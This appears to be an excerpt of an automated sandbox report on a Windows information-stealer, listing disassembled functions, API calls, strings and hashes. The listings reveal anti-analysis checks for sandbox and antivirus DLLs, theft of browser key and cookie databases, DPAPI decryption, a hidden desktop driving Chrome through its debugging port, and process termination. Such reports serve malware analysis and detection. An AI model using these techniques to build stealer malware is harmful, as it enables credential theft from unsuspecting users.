                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a226ba48a9e1850e57829bd3354a094638608d2c18dede2ad7c7ec5fa795f12b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8502C4B4A001185ADB06BF628C95AFF7BBBAB81B49F00401EF416672D1CF3C5A85CBD5

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghookx.dll), ref: 0040134A
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghooka.dll), ref: 00401371
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,snxhk.dll), ref: 00401398
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,sbiedll.dll), ref: 004013BF
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,api_log.dll), ref: 004013E6
                                                                                                                                                                                                                                                    • Part of subcall function 004012ED: lstrcmpiW.KERNEL32(?,?), ref: 00401313
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,dir_watch.dll), ref: 0040140A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                                  • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                  • API String ID: 1586166983-3272603366
                                                                                                                                                                                                                                                  • Opcode ID: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction ID: 883fd4d78f60abfb3cb12b7bb653628bb47a760653f6edd6bf7d68e1fda7e1b2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3531AD323013909BDB219B4AC9C0B517366AF44B647AA0073D902BB7B7E2B99C41CA1D

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,00643AFF,?,?,0042EEFC), ref: 0040CD86
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CEC9
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,?,00643A71,?,?,0042EEFC), ref: 0040D107
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040D11C
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040D131
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040D146
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?), ref: 0040D7A4
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040D7B5
                                                                                                                                                                                                                                                    • Part of subcall function 0040CCF2: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D342
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$lstrcpy$Find$CloseCopyCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrlen
                                                                                                                                                                                                                                                  • String ID: \key4.db$_cookies.db$_history.db$_key4.db
                                                                                                                                                                                                                                                  • API String ID: 2673225304-3347733256
                                                                                                                                                                                                                                                  • Opcode ID: 6c6e51418689e5e4f928340cd0b68f4a3454b26266b9b7ff0646cc345c9108b6
                                                                                                                                                                                                                                                  • Instruction ID: 303406ac38d3177ba7cc7e5ed1d6b9532b3c71293ad990f1a43eb8195b1ed205
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c6e51418689e5e4f928340cd0b68f4a3454b26266b9b7ff0646cc345c9108b6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B62D8B5D002589BCF01EF65C881AED77B6FF55308F00915EE8156B292DB38ABC9CB94

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040ABA9
                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 0040AC18
                                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 0040AC3C
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040AC53
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040AC5F
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040AC69
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040ACA3
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 0040AD04
                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32 ref: 0040AD74
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 0040AD87
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040A7C1: memset.MSVCRT ref: 0040A895
                                                                                                                                                                                                                                                    • Part of subcall function 0040A7C1: lstrcatA.KERNEL32(00000000,ws://localhost:9223,00000000,localhost,0042EEFC), ref: 0040A8FA
                                                                                                                                                                                                                                                    • Part of subcall function 0040A7C1: lstrcatA.KERNEL32(00000000,?), ref: 0040A90A
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415358
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: Process32First.KERNEL32(00000000,?), ref: 00415362
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: Process32Next.KERNEL32(00000000,?), ref: 0041536E
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415392
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: TerminateProcess.KERNEL32(00000000,00000000), ref: 004153A1
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: CloseHandle.KERNEL32(00000000), ref: 004153A8
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: Process32Next.KERNEL32(00000000,?), ref: 004153B0
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: CloseHandle.KERNEL32(00000000), ref: 004153BB
                                                                                                                                                                                                                                                  • CloseDesktop.USER32(?), ref: 0040AE3B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcatmemset$CloseCreateDesktopProcessProcess32$HandleNextOpenlstrcpy$FirstSleepSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID: ChromeBuildTools$OCALAPPDATA
                                                                                                                                                                                                                                                  • API String ID: 1010841495-1746588603
                                                                                                                                                                                                                                                  • Opcode ID: 2f1e4990af193369e0fe23563a2b48ce88a4d32ec127e9fc2fdf05409dd7a9b3
                                                                                                                                                                                                                                                  • Instruction ID: ec91edd0ab285c5cc363a8a4a16679f2a80a84b4960ec0103b89f5f3963ca30b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f1e4990af193369e0fe23563a2b48ce88a4d32ec127e9fc2fdf05409dd7a9b3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C81E075C003499BDB01EF20DC467EABBB5BF55308F00921AF98876252EB74A7D8CB85

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,?,?,004316B0,?,?,?,004316B0,?,?,00000028,00000028,?), ref: 00401A24
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,?,004316B0,?,?,?,004316B0,00000000,?,?,004316B0,?,?), ref: 00401BA7
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 00401E57
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?,?,?,?,004316B0), ref: 00401E8D
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,004316B0), ref: 00401EA4
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D82
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004020F2
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 004021D0
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040220F
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040221E
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcatlstrlen$AllocHandleLocalObjectReadSingleSizeSleepSystemThreadTimeWait
                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                  • API String ID: 2017216726-1173974218
                                                                                                                                                                                                                                                  • Opcode ID: eef532cc65a97336aa04c3431b8e41e9d8b606ca34f2aae58e883b8c3ab284e0
                                                                                                                                                                                                                                                  • Instruction ID: 1220b35e9d2845434e99ad0bf1b72ddbdabecf6e0090be4ca8ca09fb3933a3c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eef532cc65a97336aa04c3431b8e41e9d8b606ca34f2aae58e883b8c3ab284e0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4052B5B59002189BCF05FFA2CC56AEE7779AF44309F04815EF41567192DF386B89CBA8

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3356 4152a5-4152cf CreateToolhelp32Snapshot Process32First 3357 4152d1-4152db Process32Next 3356->3357 3358 41532e-41533f CloseHandle 3356->3358 3357->3358 3359 4152dd-4152e8 3357->3359 3360 4152eb-4152f5 StrCmpCA 3359->3360 3361 415322-41532c Process32Next 3360->3361 3362 4152f7-41530b OpenProcess 3360->3362 3361->3358 3361->3360 3363 415316-41531f CloseHandle 3362->3363 3364 41530d-415310 TerminateProcess 3362->3364 3363->3361 3364->3363
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004152BD
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 004152C7
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 004152D3
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 004152ED
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415301
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00415310
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00415317
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00415324
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041532F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  • Opcode ID: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction ID: a2afd96498c18a56c68c4cfc557fe070022b821dc9dd236c37024e5ac4685a68
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E11C839200705AFD3202B61AC4EFAB7BADFFC6751F051019FA0592251DFB49851CA75
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,004073EC,?,?,?,?,?), ref: 00414BA6
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,004073EC,?,?,?,?,?), ref: 00414BB9
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,?,?,004073EC,?,?,?,?,?), ref: 00414BC3
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414BDA
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,004073EC,?,?,?,?,?), ref: 00414BF4
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,004073EC,?,?,?,?,?), ref: 00414C02
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414C0D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 798923657-0
                                                                                                                                                                                                                                                  • Opcode ID: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction ID: 1bfb67afbcc3eeebdcc58bb0437d5f96cd4b86678791dfef96fa76067c12a520
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9118B75205205AFE7209FA5AC84F57BBA9FBC9744F16042DFA8083210DB79DC859BA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00401475
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00401484
                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 00401493
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 004014AD
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 004014B6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3466090806-0
                                                                                                                                                                                                                                                  • Opcode ID: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction ID: 11042f845f27c60c9cfe49634e62bc90fad70a14fa62364d3bf2c67db5fe234b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0F04F75104254BFD310AB66EC4DD1BBFADFFC6B55F001429F98492160D6359C14DB71
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32 ref: 0040B03B
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040B057
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040B073
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                                  • Opcode ID: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction ID: 231cd1f39a8479791712d5f3edf0a94c60cf588e50de6fedb89cc5dbc35e2890
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D90140755083029BD701EF64D845A1BFBE5FFC8754F008A2AF88493351E730D994CB92
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040129D,?,004315D8), ref: 00413D94
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,0040129D,?,004315D8), ref: 00413DA3
                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000000), ref: 00413DB1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1206570057-0
                                                                                                                                                                                                                                                  • Opcode ID: 5d518cf6961e07d286ed60c3f8fb2455d35567b628f951d60df5cb2ce1d2a2c4
                                                                                                                                                                                                                                                  • Instruction ID: 9335b4869ff5d5de368b717405b7ae0b04054e65bb97385264346cc33f41d643
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d518cf6961e07d286ed60c3f8fb2455d35567b628f951d60df5cb2ce1d2a2c4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4D06CB5B002606FD620AB6AAC0DE8B3A6CEB8AB65B850170F905D7250D6749846C6A9

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,004073EC,?,?,?,?,?), ref: 00414BA6
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: GetProcessHeap.KERNEL32(?,004073EC,?,?,?,?,?), ref: 00414BB9
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: RtlAllocateHeap.NTDLL(00000000,00000008,?,?,004073EC,?,?,?,?,?), ref: 00414BC3
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414BDA
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004073FA
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,?,00000000,00000000), ref: 00407449
                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 0040747C
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 004075D6
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00407611
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,FFFFFFFF,00000004), ref: 0040763E
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
